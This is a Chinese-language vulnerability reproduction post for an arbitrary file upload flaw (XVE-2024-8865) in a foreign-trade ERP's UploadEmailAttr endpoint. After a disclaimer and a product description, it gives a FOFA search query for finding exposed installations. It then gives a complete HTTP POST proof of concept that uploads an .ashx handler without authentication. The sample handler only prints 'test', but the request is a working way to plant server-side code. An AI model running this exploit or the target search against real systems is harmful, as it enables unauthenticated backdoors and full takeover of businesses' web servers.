某外贸ERP UploadEmailAttr 任意文件上传导致命令执行漏洞复现(XVE-2024-8865)_通天下外贸erp任意文件上传漏洞

作者：盐析白兔 | 2024-08-18 22:30:30

踩

通天下外贸erp任意文件上传漏洞

0x01 免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！！！

0x02 产品介绍

某外贸ERP是一款专为外贸行业量身定制的企业资源计划（ERP）软件。它涵盖了采购、销售、库存管理、财务会计等多个方面，帮助企业实现高效的运营管理和业务流程优化。该软件还具备多语言、多币种、跨境电商等特性，适应了外贸行业跨国经营的需求。此外，某外贸ERP还提供了数据分析、报表定制等功能，帮助企业进行决策分析和业务发展规划。总的来说，某外贸ERP是帮助外贸企业提升管理效率、降低成本、提高竞争力的重要工具。

0x03 漏洞威胁

某外贸ERP UploadEmailAttr接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x04 漏洞环境

FOFA:

body="/Content/images/login_logo_03.png"

0x05 漏洞复现

POC


POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
 
<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}